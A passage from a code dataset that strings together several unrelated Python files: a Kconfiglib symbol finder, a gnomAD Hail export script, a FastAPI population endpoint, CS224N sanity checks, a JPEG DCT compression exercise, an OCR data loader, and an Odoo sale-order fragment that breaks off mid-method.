self.tasks:\n self.vbox.addStretch(4)\n self.vbox.addWidget(error_label)\n self.vbox.addStretch(10)\n\n self.vbox.addWidget(scroll_area)\n # self.vbox.addLayout(grid)\n\n # self.vbox.addStretch(10)\n self.vbox.addLayout(self.hbox)\n\n testing_mode_button.clicked.connect(self.switch_testing_mode)\n clean_button.clicked.connect(self.clean_answers)\n check_button.clicked.connect(self.check_answers)\n answer_button.clicked.connect(self.show_answers)","sub_path":"ShowTasks.py","file_name":"ShowTasks.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"182866545","text":"# Prints all symbols, choices, menus, and comments that reference a symbol with\n# a particular name in any of their properties or property conditions.\n# Demonstrates expression fetching and walking.\n#\n# Usage:\n#\n# $ make [ARCH=] scriptconfig SCRIPT=Kconfiglib/examples/find_symbol.py SCRIPT_ARG=\n#\n# Example output for SCRIPT_ARG=X86:\n#\n#\n# Found 452 locations that reference 'X86':\n# \n# ========== Location 1 (init/Kconfig:1122) ==========\n# \n# config SGETMASK_SYSCALL\n# bool\n# prompt \"sgetmask/ssetmask syscalls support\" if EXPERT\n# default PARISC || MN10300 || BLACKFIN || M68K || PPC || MIPS || X86 || SPARC || CRIS || MICROBLAZE || SUPERH\n# help\n# sys_sgetmask and sys_ssetmask are obsolete system calls\n# no longer supported in libc but still enabled by default in some\n# architectures.\n# \n# If unsure, leave the default option here.\n# \n# ---------- Parent 1 (init/Kconfig:1091) ----------\n# \n# menuconfig EXPERT\n# bool\n# prompt \"Configure standard kernel features (expert users)\"\n# select DEBUG_KERNEL\n# help\n# This option allows certain base kernel options and settings\n# to be disabled or tweaked. This is for specialized\n# environments which can tolerate a \"non-standard\" kernel.\n# Only use this if you really know what you are doing.\n# \n# ---------- Parent 2 (init/Kconfig:39) ----------\n# \n# menu \"General setup\"\n# \n# ========== Location 2 (arch/Kconfig:28) ==========\n# \n# config OPROFILE_EVENT_MULTIPLEX\n# bool\n# prompt \"OProfile multiplexing support (EXPERIMENTAL)\" if OPROFILE && X86\n# default \"n\" if OPROFILE && X86\n# help\n# The number of hardware counters is limited. The multiplexing\n# feature enables OProfile to gather more events than counters\n# are provided by the hardware. This is realized by switching\n# between events at a user specified time interval.\n# \n# If unsure, say N.\n# \n# ---------- Parent 1 (arch/Kconfig:15) ----------\n# \n# config OPROFILE\n# ... (tons more lines)\n\nfrom kconfiglib import Kconfig, Symbol, expr_items, Choice, MENU, COMMENT, NOT\nimport sys\n\ndef expr_contains_sym(expr, sym_name):\n \"\"\"\n Returns True if a symbol (or choice, though that's unlikely) with name\n 'sym_name' appears in the expression 'expr', and False otherwise.\n\n Note that \"foo\" is represented as a constant symbol, like in the C\n implementation.\n \"\"\"\n for item in expr_items(expr):\n if item.name == sym_name:\n return True\n\n return False\n\ndef sc_references_sym(sc, sym_name):\n \"\"\"\n Returns True if a symbol with name 'sym_name' appears in any of the\n properties or property conditions of the Symbol or Choice 'sc', and False\n otherwise.\n \"\"\"\n # Search defaults\n for default, cond in sc.defaults:\n if expr_contains_sym(default, sym_name) or \\\n expr_contains_sym(cond, sym_name):\n return True\n\n if isinstance(sc, Symbol):\n # Search selects\n for select, cond in sc.selects:\n if select.name == sym_name or \\\n expr_contains_sym(cond, sym_name):\n return True\n\n # Search implies\n for imply, cond in sc.implies:\n if imply.name == sym_name or \\\n expr_contains_sym(cond, sym_name):\n return True\n\n # Search ranges\n for low, high, cond in sc.ranges:\n if low.name == sym_name or \\\n high.name == sym_name or \\\n expr_contains_sym(cond, sym_name):\n return True\n\n return False\n\ndef node_references_sym(node, sym_name):\n \"\"\"\n Returns True if a symbol with name 'sym_name' appears in the prompt\n condition of the MenuNode 'node' or in any of the properties of a\n symbol/choice stored in the menu node, and False otherwise.\n\n For MENU menu nodes, also searches the 'visible if' condition.\n\n Note that prompts are always stored in menu nodes. This is why a symbol can\n be defined in multiple locations and have a different prompt in each\n location. For MENU and COMMENT menu nodes, the prompt holds the menu title\n or comment text. This organization matches the C implementation.\n \"\"\"\n if node.prompt:\n # Search the prompt condition\n if expr_contains_sym(node.prompt[1], sym_name):\n return True\n\n if isinstance(node.item, (Symbol, Choice)):\n # Search symbol or choice\n return sc_references_sym(node.item, sym_name)\n\n if node.item == MENU:\n # Search the 'visible if' condition\n return expr_contains_sym(node.visibility, sym_name)\n\n # Comments are already handled by searching the prompt condition, because\n # 'depends on' gets propagated to it. This is why we don't need to look at\n # the direct dependencies for MENU either.\n\ndef nodes_referencing_sym(node, sym_name):\n \"\"\"\n Returns a list of all menu nodes in the menu tree rooted at 'node' that\n reference a symbol with name 'sym_name' in any of their properties. Also\n checks the properties of any symbols or choices contained in the menu\n nodes.\n \"\"\"\n res = []\n\n while node:\n if node_references_sym(node, sym_name):\n res.append(node)\n\n if node.list:\n res.extend(nodes_referencing_sym(node.list, sym_name))\n\n node = node.next\n\n return res\n\n# find_undefined.py makes use nodes_referencing_sym(), so allow use to be\n# imported\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n sys.exit('Pass symbol name (without \"CONFIG_\" prefix) with SCRIPT_ARG=')\n\n sym_name = sys.argv[2]\n\n kconf = Kconfig(sys.argv[1])\n nodes = nodes_referencing_sym(kconf.top_node, sym_name)\n\n if not nodes:\n sys.exit(\"No reference to '{}' found\".format(sym_name))\n\n print(\"Found {} locations that reference '{}':\\n\".format(len(nodes), sym_name))\n\n for i, node in enumerate(nodes, 1):\n print(\"========== Location {} ({}:{}) ==========\\n\".format(i, node.filename, node.linenr))\n print(node)\n\n parent_i = 0\n\n # Print the parents of the menu node too\n while True:\n node = node.parent\n if node is kconf.top_node:\n\t\t# Don't print the top node. Would say something like the\n\t\t# following, which isn't that interesting:\n #\n\t\t# menu \"Linux/$ARCH $KERNELVERSION Kernel Configuration\"\n break\n\n parent_i += 1\n\n print(\"---------- Parent {} ({}:{}) ----------\\n\"\n .format(parent_i, node.filename, node.linenr))\n print(node)\n","sub_path":"examples/find_symbol.py","file_name":"find_symbol.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"293755766","text":"import math\n\ndef numberOfParticipants(marks):\n\tintMarks= []\n\tfor mark in marks:\n\t\tintMarks += [int( float( n ) * 1000 + 1e-9) for n in mark.split(\" \")]\n\n\tfor cand in xrange( 1, 100000 ):\n\t\tallMarks = { i * 1000 / cand for i in xrange( cand * 10 + 1) }\n\t\tgood = True\n\t\tfor mark in intMarks:\n\t\t\tif mark not in allMarks:\n\t\t\t\tgood = False\n\t\t\t\tbreak\n\n\t\tif good:\n\t\t\treturn cand\n\n\treturn 0\n","sub_path":"d1d2_under_80/AverageProblem/solve/python/AverageProblem.py","file_name":"AverageProblem.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"583118157","text":"#!/usr/bin/env python\n\nimport hail\nfrom hail.expr import TStruct\nfrom pprint import pprint\n\ndef flatten_struct(struct, root='', leaf_only=True):\n result = {}\n for f in struct.fields:\n path = '%s.%s' % (root, f.name)\n if isinstance(f.typ, TStruct):\n result.update(flatten_struct(f.typ, path))\n if not leaf_only:\n result[path] = f\n else:\n result[path] = f\n return result\n\nhc = hail.HailContext(log=\"/hail.log\")\ngenomes_vds = hc.read('gs://gnomad-public/release/2.0.2/vds/genomes/gnomad.genomes.r2.0.2.sites.vds')\n\nas_filter_status_fields=['va.info.AS_FilterStatus']\nas_filter_status_attributes = flatten_struct(genomes_vds.variant_schema, root=\"va\")\nas_filter_status_expression = ['%s = %s.map(x => orMissing(isDefined(x), if(x.isEmpty()) \"PASS\" else x.toArray.mkString(\"|\")))' % (x, x) for x in as_filter_status_fields]\n\ngenomes_vds = genomes_vds.annotate_variants_expr(as_filter_status_expression)\npprint(genomes_vds.variant_schema)\ngenomes_vds.export_vcf('gs://gnomad-browser/genomes/sept-2017-release-202-parts/gnomad.genomes.r2.0.2.sites.parts.vcf.bgz', parallel=True)\n","sub_path":"projects/gnomad/data/export_genomes_as_parts.py","file_name":"export_genomes_as_parts.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"162392129","text":"from fastapi import APIRouter, HTTPException\r\nimport pandas as pd\r\nimport plotly.express as px\r\nimport os\r\n\r\nrouter = APIRouter()\r\n\r\nDATA_FILEPATH1 = os.path.join(os.path.dirname(__file__), \"..\", \"..\",\"data\", \"current_pop_data_final.csv\")\r\nDATA_FILEPATH2 = os.path.join(os.path.dirname(__file__), \"..\", \"..\",\"data\", \"historical_pop_data_final.csv\")\r\n\r\n@router.get('/population/{city_id}')\r\nasync def pop_to_dict(city_id: int):\r\n \"\"\"\r\n Pull demographic data for specific city, state, and year \r\n\r\n ### Query Parameters: \r\n\r\n - `city_id`: [city_id], unique numeric mapping (ex: 0 returns Anchorage, AK)\r\n\r\n ### Response\r\n Dictionary object \r\n \"\"\"\r\n rt_dict = {}\r\n rt_data_dict = {}\r\n \r\n df = pd.read_csv(DATA_FILEPATH1, encoding='utf-8')\r\n dataframe = df[df['city_id']==city_id]\r\n rt_data = dataframe.to_numpy()\r\n \r\n rt_data_dict[\"total_pop\"] = rt_data[0][4]\r\n rt_data_dict[\"land_area\"] = rt_data[0][5]\r\n rt_data_dict[\"pop_density\"] = rt_data[0][6]\r\n rt_data_dict[\"male_pop\"] = rt_data[0][7]\r\n rt_data_dict[\"female_pop\"] = rt_data[0][8]\r\n rt_data_dict[\"age_under_20\"] = rt_data[0][9]\r\n rt_data_dict[\"age_20-29\"] = rt_data[0][10]\r\n rt_data_dict[\"age_30-39\"] = rt_data[0][11]\r\n rt_data_dict[\"age_40-49\"] = rt_data[0][12]\r\n rt_data_dict[\"age_50-59\"] = rt_data[0][13]\r\n rt_data_dict[\"age_above_60\"] = rt_data[0][14]\r\n \r\n rt_dict[\"data\"] = rt_data_dict \r\n rt_dict[\"viz\"] = citypopviz(city=rt_data[0][1], state=rt_data[0][2])\r\n return rt_dict\r\n\r\ndef citypopviz(city, state,metric = 'total_pop'):\r\n \"\"\"\r\n Visualize historical population metrics from 2010 to 2018 for one city \r\n\r\n ### Query Parameters:\r\n\r\n - `metric`: 'total_pop', 'land_area', 'pop_density', 'male_pop', 'female_pop',\r\n 'age_under_20', 'age_20-29', 'age_30-39', 'age_40-49', 'age_50-59', or 'age_above_60';\r\n default='total_pop',case sensitive, total/male/female pop in thousands, land area\r\n in sq mi, pop_density in person/sqmi, age demographics in percentages\r\n\r\n - `city`: [city name], case sensitive(ex: Birmingham)\r\n\r\n - `state `: [state abbreviation], 2-letters; case sensitive (ex: AL) \r\n\r\n ### Response\r\n JSON string to render with react-plotly.js\r\n \"\"\"\r\n df = pd.read_csv(DATA_FILEPATH2, encoding='utf-8')\r\n subset = df[(df.city == city) & (df.state == state)]\r\n fig = px.line(subset, x='year', y=metric, title=f'{metric} in {city},{state}')\r\n return fig.to_json()\r\n","sub_path":"project/app/api/.ipynb_checkpoints/population-checkpoint.py","file_name":"population-checkpoint.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"215497174","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCS224N 2019-20: Homework 5\nsanity_check.py: sanity checks for assignment 5\nUsage:\n sanity_check.py 1e\n sanity_check.py 1f\n sanity_check.py 1g\n sanity_check.py 1h\n sanity_check.py 2a\n sanity_check.py 2b\n sanity_check.py 2c\n\"\"\"\nimport json\nimport math\nimport pickle\nimport sys\nimport time\n\nimport numpy as np\n\nfrom docopt import docopt\nfrom typing import List, Tuple, Dict, Set, Union\nfrom tqdm import tqdm\nfrom utils import pad_sents_char, batch_iter, read_corpus\nfrom vocab import Vocab, VocabEntry\nfrom highway import Highway, Highway_Shut\nfrom cnn import CNN \nfrom char_decoder import CharDecoder\nfrom nmt_model import NMT\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.utils\nimport torch.nn.functional as F\n\n#----------\n# CONSTANTS\n#----------\nBATCH_SIZE = 5\nEMBED_SIZE = 3\nHIDDEN_SIZE = 4\nDROPOUT_RATE = 0.0\n\nclass DummyVocab():\n def __init__(self):\n self.char2id = json.load(open('./sanity_check_en_es_data/char_vocab_sanity_check.json', 'r'))\n self.id2char = {id: char for char, id in self.char2id.items()}\n self.char_pad = self.char2id['']\n self.char_unk = self.char2id['']\n self.start_of_word = self.char2id[\"{\"]\n self.end_of_word = self.char2id[\"}\"]\n\ndef question_1e_sanity_check():\n \"\"\" Sanity check for to_input_tensor_char() function.\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 1e: To Input Tensor Char\")\n print (\"-\"*80)\n vocabEntry = VocabEntry()\n\n print(\"Running test on a list of sentences\")\n sentences = [['Human', ':', 'What', 'do', 'we', 'want', '?'], ['Computer', ':', 'Natural', 'language', 'processing', '!'], ['Human', ':', 'When', 'do', 'we', 'want', 'it', '?'], ['Computer', ':', 'When', 'do', 'we', 'want', 'what', '?']]\n sentence_length = 8\n BATCH_SIZE = 4\n word_length = 12\n output = vocabEntry.to_input_tensor_char(sentences, 'cpu')\n output_expected_size = [sentence_length, BATCH_SIZE, word_length]\n assert list(output.size()) == output_expected_size, \"output shape is incorrect: it should be:\\n {} but is:\\n{}\".format(output_expected_size, list(output.size()))\n\n print(\"Sanity Check Passed for Question 1e: To Input Tensor Char!\")\n print(\"-\"*80)\n\ndef question_1f_sanity_check(embed_dim,batch_size):\n \"\"\" Sanity check for Highway module.\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 1f: Highway Module Implementation\")\n print (\"-\"*80)\n highway = Highway(embed_dim)\n #get values for proj_weight,proj_bias,gate_weight,gate_bias and calculate ourselves\n x_conv_out=torch.ones((batch_size,embed_dim), dtype=torch.float32)\n proj_weight=highway.projection.weight.data\n proj_bias=highway.projection.bias.data\n gate_weight=highway.gate.weight.data\n gate_bias=highway.gate.bias.data\n project_value=F.relu(torch.mm(proj_weight, x_conv_out.T)+proj_bias.unsqueeze(1))\n gate_value=torch.sigmoid(torch.mm(gate_weight, x_conv_out.T)+gate_bias.unsqueeze(1))\n x_highway_test=torch.mul(project_value.T, gate_value.T)+torch.mul((1-gate_value.T),x_conv_out)\n x_highway=highway(x_conv_out)\n input_expected_size=[batch_size,embed_dim]\n #test when the gate closed (initialise gate_weight with very negative values) \n highway_shut=Highway_Shut(embed_dim)\n x_highway_shut=highway_shut(x_conv_out)\n assert list(x_conv_out.size()) == input_expected_size, \"input shape is incorrect: it should be:\\n {} but is:\\n{}\".format(input_expected_size, list(x_conv_out.size()))\n assert x_highway.size() == x_conv_out.size(), \"output shape is incorrect: it should be:\\n {} but is:\\n{}\".format(list(x_conv_out.size()), list(x_highway.size()))\n assert np.allclose(x_highway.detach().numpy(),x_highway_test.detach().numpy()), \"output is incorrect: it should be:\\n {} but is:\\n{}\".format(x_highway_test, x_highway)\n assert np.allclose(x_highway_shut.detach().numpy(),x_conv_out.numpy()), \"output is incorrect: it should be:\\n {} but is:\\n{}\".format(x_conv_out, x_highway_shut)\n print(\"Sanity Check Passed for Question 1f: Highway Module Implementation\")\n print(\"-\"*80)\n\ndef question_1g_sanity_check():\n \"\"\" \n Sanity check for CNN module.\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 1g: CNN Module Implementation\")\n print (\"-\"*80)\n char_embedding_dim,word_embedding_dim,max_word_length=(5,3,10)\n batch_size=4\n sentence_length=20\n x_reshaped=torch.ones((sentence_length, batch_size, char_embedding_dim, max_word_length), dtype=torch.float32)\n cnn=CNN(char_embedding_dim,word_embedding_dim)\n output_expected_size=[sentence_length, batch_size, word_embedding_dim]\n x_conv_out=cnn(x_reshaped)\n assert(list(x_conv_out.size()) == output_expected_size), \"output shape is incorrect: it should be:\\n {} but is:\\n{}\".format(output_expected_size, list(x_conv_out.size()))\n print(\"Sanity Check Passed for Question 1g: CNN Module Implementation\")\n print(\"-\"*80)\n\n\ndef question_1h_sanity_check(model):\n \"\"\" Sanity check for model_embeddings.py\n basic shape check\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 1h: Model Embedding\")\n print (\"-\"*80)\n sentence_length = 10\n max_word_length = 21\n inpt = torch.zeros(sentence_length, BATCH_SIZE, max_word_length, dtype=torch.long)\n ME_source = model.model_embeddings_source\n output = ME_source.forward(inpt)\n output_expected_size = [sentence_length, BATCH_SIZE, EMBED_SIZE]\n assert(list(output.size()) == output_expected_size), \"output shape is incorrect: it should be:\\n {} but is:\\n{}\".format(output_expected_size, list(output.size()))\n print(\"Sanity Check Passed for Question 1h: Model Embedding!\")\n print(\"-\"*80)\n\ndef question_2a_sanity_check(decoder, char_vocab):\n \"\"\" Sanity check for CharDecoder.forward()\n basic shape check\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 2a: CharDecoder.forward()\")\n print (\"-\"*80)\n sequence_length = 4\n inpt = torch.zeros(sequence_length, BATCH_SIZE, dtype=torch.long)\n logits, (dec_hidden1, dec_hidden2) = decoder.forward(inpt)\n logits_expected_size = [sequence_length, BATCH_SIZE, len(char_vocab.char2id)]\n dec_hidden_expected_size = [1, BATCH_SIZE, HIDDEN_SIZE]\n assert(list(logits.size()) == logits_expected_size), \"Logits shape is incorrect:\\n it should be {} but is:\\n{}\".format(logits_expected_size, list(logits.size()))\n assert(list(dec_hidden1.size()) == dec_hidden_expected_size), \"Decoder hidden state shape is incorrect:\\n it should be {} but is: {}\".format(dec_hidden_expected_size, list(dec_hidden1.size()))\n assert(list(dec_hidden2.size()) == dec_hidden_expected_size), \"Decoder hidden state shape is incorrect:\\n it should be {} but is: {}\".format(dec_hidden_expected_size, list(dec_hidden2.size()))\n print(\"Sanity Check Passed for Question 2a: CharDecoder.forward()!\")\n print(\"-\"*80)\n\ndef question_2b_sanity_check(decoder):\n \"\"\" Sanity check for CharDecoder.train_forward()\n basic shape check\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 2b: CharDecoder.train_forward()\")\n print (\"-\"*80)\n sequence_length = 4\n inpt = torch.ones(sequence_length, BATCH_SIZE, dtype=torch.long)\n loss = decoder.train_forward(inpt)\n assert(list(loss.size()) == []), \"Loss should be a scalar but its shape is: {}\".format(list(loss.size()))\n print(\"Sanity Check Passed for Question 2b: CharDecoder.train_forward()!\")\n print(\"-\"*80)\n\ndef question_2c_sanity_check(decoder):\n \"\"\" Sanity check for CharDecoder.decode_greedy()\n basic shape check\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 2c: CharDecoder.decode_greedy()\")\n print (\"-\"*80)\n sequence_length = 4\n inpt = torch.zeros(1, BATCH_SIZE, HIDDEN_SIZE, dtype=torch.float)\n initialStates = (inpt, inpt)\n device = decoder.char_output_projection.weight.device\n decodedWords = decoder.decode_greedy(initialStates, device)\n assert(len(decodedWords) == BATCH_SIZE), \"Length of decodedWords should be {} but is: {}\".format(BATCH_SIZE, len(decodedWords))\n print(\"Sanity Check Passed for Question 2c: CharDecoder.decode_greedy()!\")\n print(\"-\"*80)\n\ndef main():\n \"\"\" Main func.\n \"\"\"\n args = docopt(__doc__)\n\n # Check Python & PyTorch Versions\n assert (sys.version_info >= (3, 5)), \"Please update your installation of Python to version >= 3.5\"\n assert(torch.__version__ >= \"1.0.0\"), \"Please update your installation of PyTorch. You have {} and you should have version 1.0.0\".format(torch.__version__)\n\n # Seed the Random Number Generators\n seed = 1234\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n np.random.seed(seed * 13 // 7)\n\n vocab = Vocab.load('./sanity_check_en_es_data/vocab_sanity_check.json')\n\n # Create NMT Model\n model = NMT(\n word_embed_size=EMBED_SIZE,\n hidden_size=HIDDEN_SIZE,\n dropout_rate=DROPOUT_RATE,\n vocab=vocab)\n\n char_vocab = DummyVocab()\n\n # Initialize CharDecoder\n decoder = CharDecoder(\n hidden_size=HIDDEN_SIZE,\n char_embedding_size=EMBED_SIZE,\n target_vocab=char_vocab)\n\n if args['1e']:\n question_1e_sanity_check()\n elif args['1f']:\n question_1f_sanity_check(EMBED_SIZE,BATCH_SIZE)\n elif args['1g']:\n question_1g_sanity_check()\n elif args['1h']:\n question_1h_sanity_check(model)\n elif args['2a']:\n question_2a_sanity_check(decoder, char_vocab)\n elif args['2b']:\n question_2b_sanity_check(decoder)\n elif args['2c']:\n question_2c_sanity_check(decoder)\n else:\n raise RuntimeError('invalid run mode')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cs224n/a5/sanity_check.py","file_name":"sanity_check.py","file_ext":"py","file_size_in_byte":9768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"143338165","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\n\n\n# DCT hyoer-parameter\nT = 8\nK = 4\n\n# DCT weight\ndef w(x, y, u, v):\n cu = 1.\n cv = 1.\n if u == 0:\n cu /= np.sqrt(2.)\n if v == 0:\n cv /= np.sqrt(2.)\n return (2*cu*cv/T) * (np.cos((2*x+1)*u*np.pi/2/T)) * (np.cos((2*y+1)*v*np.pi/2/T))\n\n\n# DCT\ndef dct(img):\n F = np.zeros((H, W, channel), dtype=np.float32)\n for c in range(channel):\n for yi in range(0, H, T):\n for xi in range(0, W, T): # crop the image into 8 X 8\n for v in range(0, T):\n for u in range(0, T): # each(u, v) in K space represent a cosine wave\n for y in range(0, T):\n for x in range(0, T): # each cosine wave contribute to the entire image\n F[v+yi, u+xi, c] += img[y+yi, x+xi, c] * w(x,y,u,v)\n return F\n\n# IDCT\ndef idct(F):\n out = np.zeros((H, W, channel), dtype=np.float32)\n for c in range(channel):\n for yi in range(0, H, T):\n for xi in range(0, W, T): # crop the image into 8 X 8\n for y in range(0, T):\n for x in range(0, T): # each(u, v) in K space represent a cosine wave\n for v in range(0, K):\n for u in range(0, K): # each cosine wave contribute to the entire image\n out[y+yi, x+xi, c] += F[v+yi, u+xi, c] * w(x,y,u,v)\n \n # clipping\n out = np.clip(out, 0, 255)\n out = out.astype(np.uint8)\n\n return out\n\n# MSE\ndef MSE(img, out):\n mse = np.sum((img - out) ** 2) / (H * W * channel)\n return mse\n\n# PSNR\ndef PSNR(mse, vmax=255):\n return 10 * np.log10(vmax * vmax / mse)\n\n# bitrate\ndef BITRATE():\n return 1. * T * K * K / T / T\n\n# BGR2YCbCr\ndef BGR2YCbCr(img):\n out = np.zeros([H, W, channel], dtype=np.float32)\n B = img[:, :, 0]\n G = img[:, :, 1]\n R = img[:, :, 2]\n \n Y = 0.2990 * R + 0.5870 * G + 0.1140 * B\n Cb = -0.1687 * R - 0.3313 * G + 0.5 * B + 128\n Cr = 0.5 * R - 0.4187 * G - 0.0813 * B + 128\n out[:, :, 0] = Y\n out[:, :, 1] = Cb\n out[:, :, 2] = Cr\n\n return out\n\n# YCbCr2BGR\ndef YCbCr2BGR(img_):\n out = np.zeros([H, W, channel], dtype=np.float32)\n out[..., 2] = img_[..., 0] + (img_[..., 2] - 128.) * 1.4020\n out[..., 1] = img_[..., 0] - (img_[..., 1] - 128.) * 0.3441 - (img_[..., 2] - 128.) * 0.7139\n out[..., 0] = img_[..., 0] + (img_[..., 1] - 128.) * 1.7718\n \n # clipping\n out = np.clip(out, 0, 255)\n out = out.astype(np.uint8)\n\n return out\n\ndef quantization(F):\n \n Q1 = np.array(((16, 11, 10, 16, 24, 40, 51, 61),\n (12, 12, 14, 19, 26, 58, 60, 55),\n (14, 13, 16, 24, 40, 57, 69, 56),\n (14, 17, 22, 29, 51, 87, 80, 62),\n (18, 22, 37, 56, 68, 109, 103, 77),\n (24, 35, 55, 64, 81, 104, 113, 92),\n (49, 64, 78, 87, 103, 121, 120, 101),\n (72, 92, 95, 98, 112, 100, 103, 99)), dtype=np.float32)\n \n Q2 = np.array(((17, 18, 24, 47, 99, 99, 99, 99),\n (18, 21, 26, 66, 99, 99, 99, 99),\n (24, 26, 56, 99, 99, 99, 99, 99),\n (47, 66, 99, 99, 99, 99, 99, 99),\n (99, 99, 99, 99, 99, 99, 99, 99),\n (99, 99, 99, 99, 99, 99, 99, 99),\n (99, 99, 99, 99, 99, 99, 99, 99),\n (99, 99, 99, 99, 99, 99, 99, 99)), dtype=np.float32)\n \n Q = Q1\n for c in range(channel):\n if c > 0:\n Q = Q2\n for ys in range(0, H, T):\n for xs in range(0, W, T):\n F[ys: ys + T, xs: xs + T,c] = np.round(F[ys: ys + T, xs: xs + T, c] / Q) * Q\n \n return F\n\n\n# Read image\nimg = cv2.imread(\"imori.jpg\").astype(np.float32)\nH, W, channel = img.shape\n\n# BGR2YCbCr\nimg_ = BGR2YCbCr(img)\n\n# DCT\nF = dct(img_)\n\n# quantization\nF_ = quantization(F)\n\n# IDCT\nout_ = idct(F_)\n\n# YCbCr2BGR\nout = YCbCr2BGR(out_)\n\n# MSE\nmse = MSE(img, out)\n\n# PSNR\npsnr = PSNR(mse)\n\n# bitrate\nbitrate = BITRATE()\n\nprint(\"MSE:\", mse)\nprint(\"PSNR:\", psnr)\nprint(\"bitrate:\", bitrate)\n\n# Save result\ncv2.namedWindow(\"result\", 0)\ncv2.resizeWindow(\"result\", 256, 256)\n\ncv2.imshow(\"result\", out)\ncv2.waitKey(0)\n\ncv2.imwrite(\"Myresult/out40.jpg\", out)\n\ncv2.destroyAllWindows()\n","sub_path":"Question_31_40/JPEG Compression(Step4) YCbCr+DCT+Quantization.py","file_name":"JPEG Compression(Step4) YCbCr+DCT+Quantization.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"629420770","text":"from torch.utils.data import Dataset\nimport numpy as np\nimport cv2\nimport os\nimport torch\nimport csv\nimport time\nimport utility\nimport params\n\n\nclass chiDataSet(Dataset):\n def __init__(self, converter: utility.strLabelConverter, img_root, label_path,\n roi_config: utility.roi_controller, statistical_para, transforms=None):\n super(chiDataSet, self).__init__()\n self.img_root = img_root\n self.converter = converter\n self.transforms = transforms\n self.rois = roi_config.rois\n self.gt_col = roi_config.gt_cols\n self.statistical_para = statistical_para\n self.labels = self.get_labels(label_path)\n\n def get_labels(self, label_path):\n img_files = os.listdir(self.img_root + 'pos_imgs')\n update_flag = False\n with open(label_path, 'r', encoding='utf-8-sig') as file:\n reader = csv.reader(file)\n labels = []\n for c in reader:\n if ('pos_' + c[0] + '.jpg') not in img_files:\n continue\n label = []\n for index in self.gt_col:\n if index == params.addr_c:\n label.append(c[index].lower()[0:24])\n elif index == params.police_c:\n label.append(c[index].lower())\n elif index == params.date_c:\n label.append(c[index].lower().replace('.', '').replace('-', ''))\n else:\n label.append(c[index].lower())\n for item in c[index].lower():\n if item not in self.converter.dict.keys():\n update_flag = True\n self.converter.dict[item] = len(self.converter.dict) + 1\n self.converter.alphabet += item\n labels.append({c[0]: label})\n if update_flag:\n t = time.strftime('%Y_%m_%d_%H_%M', time.localtime())\n torch.save(self.converter.dict, 'dict_' + t)\n return labels\n\n def __len__(self):\n return len(self.labels)\n\n def preprocessing(self, image):\n image = image.astype(np.float32) / 255.\n image = torch.from_numpy(image).type(torch.FloatTensor)\n image.sub_(self.statistical_para[0]).div_(self.statistical_para[1])\n return image\n\n def __getitem__(self, index):\n image_name = list(self.labels[index].keys())[0]\n label = list(self.labels[index].values())[0]\n images = []\n image_pos = cv2.imread(self.img_root + 'pos_imgs/pos_' + image_name + '.jpg', 0)\n image_neg = cv2.imread(self.img_root + 'neg_imgs/neg_' + image_name + '.jpg', 0)\n for i in range(len(self.rois)):\n roi = self.rois[i]\n if self.gt_col[0] not in [9, 10]:\n images.append(image_pos[roi[0]:roi[1], roi[2]:roi[3]])\n else:\n images.append(image_neg[roi[0]:roi[1], roi[2]:roi[3]])\n if images[i].shape[0] != 32:\n raise RuntimeError('img height should be 32')\n images_stack = np.hstack(images)\n cv2.imshow(\"img\", images_stack)\n images_stack = images_stack.reshape(32, images_stack.shape[1], 1).transpose(2, 0, 1)\n images_stack = self.preprocessing(images_stack)\n cv2.waitKey(0)\n return images_stack, label[0]\n","sub_path":"dataset_for_chinese.py","file_name":"dataset_for_chinese.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"66581825","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Ursa Information Systems\n# Author: Sandip Mangukiya ()\n# Bhavesh Odedra ()\n# Copyright (C) 2015 ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\n\n\nclass sale_order(osv.osv):\n _inherit = \"sale.order\"\n _description = \"Sales Order\"\n \n def search_read(self, cr, uid, domain=None, fields=None, offset=0, limit=None, order=None, context=None):\n if self.pool['res.users'].has_group(cr, uid, 'base.group_sale_salesman_all_leads_special'):\n #Find House User\n house_user_ids = self.pool.get('res.users').search(cr, uid, [('name','ilike','GIW House Account')], context=context)\n house_user_ids.append(uid)\n 